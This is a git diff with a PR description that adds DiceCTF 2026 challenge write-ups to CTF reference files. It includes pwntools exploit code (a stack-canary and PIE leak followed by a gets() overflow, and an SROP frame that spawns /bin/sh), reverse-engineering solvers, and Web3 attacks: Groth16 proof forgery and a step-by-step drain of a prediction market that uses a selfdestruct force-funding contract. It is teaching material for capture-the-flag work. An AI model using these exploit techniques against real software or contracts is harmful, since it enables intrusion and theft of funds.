+    ret_addr += resp[1:2]
+
+pie_base = u64(ret_addr.ljust(8, b'\x00')) - known_offset
+admin_portal = pie_base + admin_offset
+
+# Overflow gets() with leaked canary + computed address
+payload = b'A' * 24 + canary + p64(0) + p64(admin_portal)
+p.sendline(payload)
+```
+
+**When to use:** Any function that traverses a buffer with user-controlled step size and null-terminator-based stop condition.
+
+**Key insight:** Stride-based OOB reads leak one byte per iteration by controlling which offset lands on the target byte. With enough iterations, leak full canary + return address to defeat both stack canary and PIE.
+
 ## Global Buffer Overflow (CSV Injection)
 
 **Pattern (Spreadsheet):** Overflow adjacent global variables via extra CSV delimiters to change filename pointer. See [advanced.md](advanced.md) for full exploit pattern.

--- a/ctf-pwn/rop-and-shellcode.md
+++ b/ctf-pwn/rop-and-shellcode.md
@@ -143,6 +143,44 @@ flag = p.recv(timeout=3)
 # by earlier read() calls. Use explicit sendline() after delays instead.
 ```
 
+## SROP with UTF-8 Payload Constraints (DiceCTF 2026)
+
+**Pattern (Message Store):** Rust binary where OOB color index reads memcpy from GOT, causing `memcpy(stack, BUFFER, 0x1000)` — a massive stack overflow. But `from_utf8_lossy()` validates the buffer first: any invalid UTF-8 triggers `Cow::Owned` with corrupted replacement data. **The entire 0x1000-byte payload must be valid UTF-8.**
+
+**Why SROP:** Normal ROP gadget addresses contain bytes >0x7f which are invalid single-byte UTF-8. SROP needs only 3 gadgets (set rax=15, call syscall) to trigger `sigreturn`, then a signal frame sets ALL registers for `execve("/bin/sh", NULL, NULL)`.
+
+**UTF-8 multi-byte spanning trick:** Register fields in the signal frame are 8 bytes each, packed contiguously. A 3-byte UTF-8 sequence can start in one field and end in the next:
+
+```python
+from pwn import *
+
+# r15 is the field immediately before rdi in the sigframe
+# rdi = pointer to "/bin/sh" = 0x2f9fb0 → bytes [B0, 9F, 2F, ...]
+# B0, 9F are UTF-8 continuation bytes (10xxxxxx) — invalid as sequence start
+# Solution: set r15's last byte to 0xE0 (3-byte UTF-8 leader)
+# E0 B0 9F = valid UTF-8 (U+0C1F) spanning r15→rdi boundary
+
+frame = SigreturnFrame()
+frame.rax = 59          # execve
+frame.rdi = buf_addr + 0x178  # address of "/bin/sh\0"
+frame.rsi = 0
+frame.rdx = 0
+frame.rip = syscall_addr
+frame.r15 = 0xE000000000000000  # Last byte 0xE0 starts 3-byte UTF-8 seq
+
+# ROP preamble: 3 UTF-8-safe gadgets
+payload = b'\x00' * 0x48           # padding to return address
+payload += p64(pop_rax_ret)        # set rax = 15 (sigreturn)
+payload += p64(15)
+payload += p64(syscall_ret)        # trigger sigreturn
+payload += bytes(frame)
+# Place "/bin/sh\0" at offset 0x178 in BUFFER
+```
+
+**When to use:** Any exploit where payload bytes pass through UTF-8 validation (Rust `String`, `from_utf8`, JSON parsers). SROP minimizes the number of gadget addresses that must be UTF-8-safe.
+
+**Key insight:** Multi-byte UTF-8 sequences (2-4 bytes) can span adjacent fields in structured data (signal frames, ROP chains). Set the leader byte (0xC0-0xF7) as the last byte of one field so continuation bytes (0x80-0xBF) in the next field form a valid sequence.
+
 ## Seccomp Bypass
 
 Alternative syscalls when seccomp blocks `open()`/`read()`:

--- a/ctf-reverse/SKILL.md
+++ b/ctf-reverse/SKILL.md
@@ -15,7 +15,7 @@ Quick reference for RE challenges. For detailed techniques, see supporting files
 ## Additional Resources
 
 - [tools.md](tools.md) - Tool-specific commands (GDB, Ghidra, radare2, IDA, RISC-V with Capstone)
-- [patterns.md](patterns.md) - Core binary patterns: custom VMs, anti-debugging, nanomites, self-modifying code, XOR ciphers, mixed-mode stagers, LLVM obfuscation, S-box/keystream, SECCOMP/BPF, exception handlers, memory dumps, byte-wise transforms, x86-64 gotchas, hidden emulator opcodes, LD_PRELOAD key extraction, SPN static extraction, image XOR smoothness, byte-at-a-time cipher, mathematical convergence bitmap
+- [patterns.md](patterns.md) - Core binary patterns: custom VMs, anti-debugging, nanomites, self-modifying code, XOR ciphers, mixed-mode stagers, LLVM obfuscation, S-box/keystream, SECCOMP/BPF, exception handlers, memory dumps, byte-wise transforms, x86-64 gotchas, hidden emulator opcodes, LD_PRELOAD key extraction, SPN static extraction, image XOR smoothness, byte-at-a-time cipher, mathematical convergence bitmap, Sprague-Grundy game theory, kernel module maze solving, multi-threaded VM channels, multi-layer self-decrypting brute-force
 - [languages.md](languages.md) - Language/platform-specific: Python bytecode & opcode remapping, Python version-specific bytecode, DOS stubs, Unity IL2CPP, Brainfuck/esolangs, UEFI, transpilation to C, code coverage side-channel, OPAL functional reversing, non-bijective substitution
 
 ---
@@ -310,3 +310,19 @@ Binary hashes every prefix independently. Recover one character at a time by mat
 ## RISC-V Binary Analysis
 
 Statically linked, stripped RISC-V ELF. Use Capstone with `CS_MODE_RISCVC | CS_MODE_RISCV64` for mixed compressed instructions. Emulate with `qemu-riscv64`. Watch for fake flags and XOR decryption with incremental keys. See [tools.md](tools.md#risc-v-binary-analysis-ehax-2026).
+
+## Sprague-Grundy Game Theory Binary
+
+Game binary plays bounded Nim with PRNG for losing-position moves. Identify game framework (Grundy values = pile % (k+1), XOR determines position), track PRNG state evolution through user input feedback. See [patterns.md](patterns.md#sprague-grundy-game-theory-binary-dicectf-2026).
+
+## Kernel Module Maze Solving
+
+Rust kernel module implements maze via device ioctls. Enumerate commands dynamically, build DFS solver with decoy avoidance, deploy as minimal static binary (raw syscalls, no libc). See [patterns.md](patterns.md#kernel-module-maze-solving-dicectf-2026).
+
+## Multi-Threaded VM with Channels
+
+Custom VM with 16+ threads communicating via futex channels. Trace data flow across thread boundaries, extract constants from GDB, watch for inverted validity logic, solve via BFS state space search. See [patterns.md](patterns.md#multi-threaded-vm-with-channel-synchronization-dicectf-2026).
+
+## Multi-Layer Self-Decrypting Binary
+
+N-layer binary where each layer decrypts the next using user-provided key bytes + SHA-NI. Use oracle (correct key → valid code with expected pattern). JIT execution with fork-per-candidate COW isolation for speed. See [patterns.md](patterns.md#multi-layer-self-decrypting-binary-dicectf-2026).

--- a/ctf-reverse/patterns.md
+++ b/ctf-reverse/patterns.md
@@ -836,6 +836,188 @@ for c4 in charset:
 
 ---
 
+## Sprague-Grundy Game Theory Binary (DiceCTF 2026)
+
+**Pattern (Bedtime):** Stripped Rust binary plays N rounds of bounded Nim. Each round has piles and max-move parameter k. Binary uses a PRNG for moves when in a losing position; user must respond optimally so the PRNG eventually generates an invalid move (returns 1). Sum of return values must equal a target.
+
+**Game theory identification:**
+- Bounded Nim: remove 1 to k items from any pile per turn
+- **Grundy value** per pile: `pile_value % (k+1)`
+- **XOR** of all Grundy values: non-zero = winning (N-position), zero = losing (P-position)
+- N-positions: computer wins automatically (returns 0)
+- P-positions: computer uses PRNG, may make invalid move (returns 1)
+
+**PRNG state tracking through user feedback:**
+```python
+MASK64 = (1 << 64) - 1
+
+def prng_step(state, pile_count, k):
+    """Computer's PRNG move. Returns (pile_idx, amount, new_state)."""
+    r12 = state[2] ^ 0x28027f28b04ccfa7
+    rax = (state[1] + r12) & MASK64
+    s0_new = ROL64((state[0] ** 2 + rax) & MASK64, 32)
+    r12_upd = (r12 + rax) & MASK64
+    s0_final = ROL64((s0_new ** 2 + r12_upd) & MASK64, 32)
+
+    pile_idx = rax % pile_count
+    amount = (r12_upd % k) + 1
+    return pile_idx, amount, [s0_final, r12_upd, state[2]]
+
+# Critical: state[2] updated ONLY by user moves (XOR of pile_idx, amount, new_value)
+# PRNG moves do NOT affect state[2] — creates feedback loop
+```
+
+**Solving approach:**
+1. Dump game data from GDB (all entries with pile values and parameters)
+2. Classify: count P-positions (return 1) vs N-positions (return 0)
+3. Simulate each P-position: PRNG moves → user responds optimally → track state[2]
+4. Encode user moves as input format (4-digit decimal pairs, reversed order)
+
+**Key insight:** When a game binary's PRNG state depends on user input, you must simulate the full feedback loop — not just solve the game theory. Use GDB hardware watchpoints to discover which state variables are affected by user vs computer moves.
+
+---
+
+## Kernel Module Maze Solving (DiceCTF 2026)
+
+**Pattern (Explorer):** Rust kernel module implements a 3D maze via `/dev/challenge` ioctls. Navigate the maze, avoid decoy exits (status=2), find the real exit (status=1), read the flag.
+
+**Ioctl enumeration:**
+| Command | Description |
+|---------|-------------|
+| `0x80046481-83` | Get maze dimensions (3 axes, 8-16 each) |
+| `0x80046485` | Get status: 0=playing, 1=WIN, 2=decoy |
+| `0x80046486` | Get wall bitfield (6 directions) |
+| `0x80406487` | Get flag (64 bytes, only when status=1) |
+| `0x40046488` | Move in direction (0-5) |
+| `0x6489` | Reset position |
+
+**DFS solver with decoy avoidance:**
+```c
+// Minimal static binary using raw syscalls (no libc) for small upload size
+// gcc -nostdlib -static -Os -fno-builtin -o solve solve.c -Wl,--gc-sections && strip solve
+
+int visited[16][16][16];
+int bad[16][16][16];   // decoy positions across resets
+
+void dfs(int fd, int x, int y, int z) {
+    if (visited[x][y][z] || bad[x][y][z]) return;
+    visited[x][y][z] = 1;
+
+    int status = ioctl_get_status(fd);
+    if (status == 1) { read_flag(fd); exit(0); }
+    if (status == 2) { bad[x][y][z] = 1; return; }  // decoy — mark bad
+
+    int walls = ioctl_get_walls(fd);
+    int dx[] = {1,-1,0,0,0,0}, dy[] = {0,0,1,-1,0,0}, dz[] = {0,0,0,0,1,-1};
+    int opp[] = {2,3,0,1,5,4};  // opposite directions for backtracking
+
+    for (int dir = 0; dir < 6; dir++) {
+        if (!(walls & (1 << dir))) continue;  // wall present
+        ioctl_move(fd, dir);
+        dfs(fd, x+dx[dir], y+dy[dir], z+dz[dir]);
+        ioctl_move(fd, opp[dir]);  // backtrack
+    }
+}
+// After decoy hit: reset via ioctl 0x6489, clear visited, re-run DFS
+```
+
+**Remote deployment:** Upload binary via base64 chunks over netcat shell, decode, execute.
+
+**Key insight:** For kernel module challenges, injecting test binaries into initramfs and probing ioctls dynamically is faster than static RE of stripped kernel modules. Keep solver binary minimal (raw syscalls, no libc) for fast upload.
+
+---
+
+## Multi-Threaded VM with Channel Synchronization (DiceCTF 2026)
+
+**Pattern (locked-in):** Custom stack-based VM runs 16 concurrent threads verifying a 30-char flag. Threads communicate via futex-based channels. Pipeline: input → XOR scramble → transformation → base-4 state machine → final check.
+
+**Analysis approach:**
+1. **Identify thread roles** by tracing channel read/write patterns in GDB
+2. **Extract constants** (XOR scramble values, lookup tables) via breakpoints on specific opcodes
+3. **Watch for inverted logic:** validity check returns 0 for valid, non-zero for blocked (opposite of intuition)
+4. **Detect futex quirks:** `unlock_pi` on unowned mutex returns EPERM=1, which can change all computations
+
+**BFS state space search for constrained state machines:**
+```python
+from collections import deque
+
+def solve_flag(scramble_vals, lookup_table, initial_state, target_state):
+    """BFS through state machine to find valid flag bytes."""
+    flag = [None] * 30
+    # Known prefix/suffix from flag format
+    flag[0:5] = list(b'dice{')
+    flag[29] = ord('}')
+
+    # For each unknown position, try all printable ASCII
+    states = {initial_state}
+    for pos in range(28, 4, -1):  # processed in reverse
+        next_states = {}
+        for state in states:
+            for ch in range(32, 127):
+                transformed = transform(ch, scramble_vals[pos])
+                digits = to_base4(transformed)
+                new_state = apply_digits(state, digits, lookup_table)
+                if new_state is not None:  # valid path exists
+                    next_states.setdefault(new_state, []).append((state, ch))
+        states = set(next_states.keys())
+
+    # Trace back from target_state to recover flag
+```
+
+**Key insight:** Multi-threaded VMs require tracing data flow across thread boundaries. Channel-based communication creates a pipeline — identify each thread's role (input, transform, validate, output) by watching which channels it reads/writes. Constants that affect computation may come from unexpected sources (futex return values, thread IDs).
+
+---
+
+## Multi-Layer Self-Decrypting Binary (DiceCTF 2026)
+
+**Pattern (another-onion):** Binary with N layers (e.g., 256), each reading 2 key bytes, deriving keystream via SHA-256 NI instructions, XOR-decrypting the next layer, then jumping to it. Must solve within a time limit (e.g., 30 minutes).
+
+**Oracle for correct key:** Wrong key bytes produce garbage code. Correct key bytes produce code with exactly 2 `call read@plt` instructions (next layer's reads). Brute-force all 65536 candidates per layer using this oracle.
+
+**JIT execution approach (fastest):**
+```c
+// Map binary's memory at original virtual addresses into solver process
+// Compile solver at non-overlapping address: -Wl,-Ttext-segment=0x10000000
+void *text = mmap((void*)0x400000, text_size, PROT_RWX, MAP_FIXED|MAP_PRIVATE, fd, 0);
+void *bss = mmap((void*)bss_addr, bss_size, PROT_RW, MAP_FIXED|MAP_SHARED, shm_fd, 0);
+
+// Patch read@plt to inject candidate bytes instead of reading stdin
+// Patch tail jmp/call to next layer with ret/NOP to return from layer
+
+// Fork-per-candidate: COW gives isolated memory without memcpy
+for (int candidate = 0; candidate < 65536; candidate++) {
+    pid_t pid = fork();
+    if (pid == 0) {
+        // Child: remap BSS as MAP_PRIVATE (COW from shared file)
+        mmap(bss_addr, bss_size, PROT_RW, MAP_FIXED|MAP_PRIVATE, shm_fd, 0);
+        inject_key(candidate >> 8, candidate & 0xff);
+        ((void(*)())layer_addr)();  // Execute layer as function call
+        // Check: does decrypted code contain exactly 2 call read@plt?
+        if (count_read_calls(next_layer_addr) == 2) signal_found(candidate);
+        _exit(0);
+    }
+}
+```
+
+**Performance tiers:**
+| Approach | Speed | 256-layer estimate |
+|----------|-------|--------------------|
+| Python subprocess | ~2/s | days |
+| Ptrace fork injection | ~119/s | 6+ hours |
+| JIT + fork-per-candidate | ~1000/s | 140 min |
+| JIT + shared BSS + 32 workers | ~3500/s | **~17 min** |
+
+**Shared BSS optimization:** BSS (16MB+) stored in `/dev/shm` as `MAP_SHARED` in parent. Children remap as `MAP_PRIVATE` for COW. Reduces fork overhead from 16MB page-table setup to ~4KB.
+
+**Key insight:** Multi-layer decryption challenges are fundamentally about building fast brute-force engines. JIT execution (mapping binary memory into solver, running code directly as function calls) is orders of magnitude faster than ptrace. Fork-based COW provides free memory isolation per candidate.
+
+**Gotchas:**
+- Real binary may use `call` (0xe8) instead of `jmp` (0xe9) for layer transitions — adjust tail patching
+- BSS may extend beyond ELF MemSiz via kernel brk mapping — map extra space
+- SHA-NI instructions work even when not advertised in `/proc/cpuinfo`
+
+---
+
 ## Timing Side-Channel Attack
 
 **Pattern (Clock Out):** Validation time varies per correct character (longer sleep on match).

--- a/ctf-web/web3.md
+++ b/ctf-web/web3.md
@@ -173,6 +173,70 @@ cast send $VAULT "withdraw()" --rpc-url $RPC --private-key $KEY
 
 ---
 
+## Groth16 Proof Forgery for Blockchain Governance (DiceCTF 2026)
+
+**Pattern (Housing Crisis):** DAO governance protected by Groth16 ZK proofs. Two ZK-specific vulnerabilities:
+
+**Broken trusted setup (delta == gamma):** Trivially forge any proof:
+```python
+from py_ecc.bn128 import G1, G2, multiply, add, neg
+
+# When vk_delta_2 == vk_gamma_2, set:
+forged_A = vk_alpha1
+forged_B = vk_beta2
+forged_C = neg(vk_x)  # negate the public input accumulator
+# This verifies for ANY public inputs
+```
+
+**Proof replay (unconstrained nullifier):** DAO never tracks used `proposalNullifierHash` values. Extract a valid proof from the setup contract's deployment transaction and replay it for every proposal.
+
+**When to check in Web3 challenges:**
+1. Compare `vk_delta_2` and `vk_gamma_2` — if equal, Groth16 is trivially broken
+2. Check if the verifier contract tracks proof nullifiers
+3. Look for valid proofs in deployment/setup transactions
+
+---
+
+## Phantom Market Unresolve + Force-Funding (DiceCTF 2026)
+
+**Pattern (Housing Crisis):** Prediction market with DAO governance. Three combined vulnerabilities drain the market.
+
+**Vulnerability 1 — Phantom market betting:**
+`bet()` checks `marketResolution[market] == 0` but NOT whether the market formally exists (no `market < nextMarketIndex` check). Bet on phantom market IDs (beyond `nextMarketIndex`).
+
+**Vulnerability 2 — State persistence on unresolve:**
+When `createMarket()` later reaches the phantom market ID, it writes `marketResolution[id] = 0`. This effectively "unresolves" the market, but old `totalYesBet`/`totalNoBet` values persist, enabling a second cashout.
+
+**Vulnerability 3 — Force-fund via selfdestruct:**
+```solidity
+// EIP-6780: selfdestruct in constructor sends ETH even to contracts without receive()
+contract ForceSend {
+    constructor(address payable target) payable {
+        selfdestruct(target);  // Forces ETH into DAO
+    }
+}
+// Deploy: new ForceSend{value: amount}(dao_address)
+```
+
+**Drain cycle:**
+1. Force-fund DAO with `2*marketBalance` wei
+2. Helper1 bets 1 wei NO on phantom market N
+3. DAO bets `2*marketBalance` YES via delegatecall proposal
+4. Resolve market NO → Helper1 cashouts (net zero for market, but `totalYesBet` persists)
+5. `createMarket()` reaches N → writes `marketResolution[N]=0` (unresolve)
+6. Helper2 bets 1 wei NO → resolve NO → Helper2 cashout = `1 + totalYesBet/2 = 1 + marketBalance`
+
+**Key math:** Payout = `helperBet + helperBet * totalYesBet / totalNoBet = 1 + 1 * 2*mBal / 2 = 1 + mBal`. Market had `mBal + 1`, pays `1 + mBal` → balance = 0.
+
+**Gotchas:**
+- **EVM `.call` with insufficient balance silently fails** — size DAO bet so payout ≤ market balance
+- **ethers.js BigInt:** Use `!== 0n` not `!== 0` for comparisons
+- **EIP-6780 selfdestruct:** Must be in constructor (not runtime) for same-tx contract deletion, but ETH transfer works either way
+
+**When to check:** Prediction markets / betting contracts — always test: can you bet on non-existent market IDs? Does market creation reset resolution state without clearing bet totals?
+
+---
+
 ## Web3 CTF Tips
 
 - **Factory pattern:** Instance = per-player contract. Check `playerToInstance(address)` mapping.


### PR DESCRIPTION
## Summary

- **Pwn (3 challenges):** Stride-based OOB read for canary/PIE leak (ByteCrusher), SROP with UTF-8 payload constraints in Rust binaries (Message Store), GC null-reference cascading corruption → FSOP (Garden)
- **Reverse (4 challenges):** Sprague-Grundy game theory with PRNG state tracking (Bedtime), kernel module ioctl maze solving with decoy avoidance (Explorer), multi-threaded VM with futex channels and inverted validity logic (locked-in), multi-layer self-decrypting binary with JIT fork-COW brute-force (another-onion)
- **Crypto (2 challenges):** Groth16 broken trusted setup forgery + proof replay (Housing Crisis), DV-SNARG forgery via verifier oracle and CRS entry cancellation (Dot)
- **Misc/ML (1 challenge):** ML weight perturbation negation to invert fine-tuning suppression (leadgate)
- **Web3 (from Housing Crisis):** Groth16 proof forgery for blockchain governance, phantom market unresolve + selfdestruct force-funding

12 files changed across 7 skill categories, 572 lines added.

## Test plan

- [ ] Verify all markdown renders correctly on GitHub
- [ ] Confirm cross-references between SKILL.md and technique files are valid
- [ ] Check no existing techniques were accidentally modified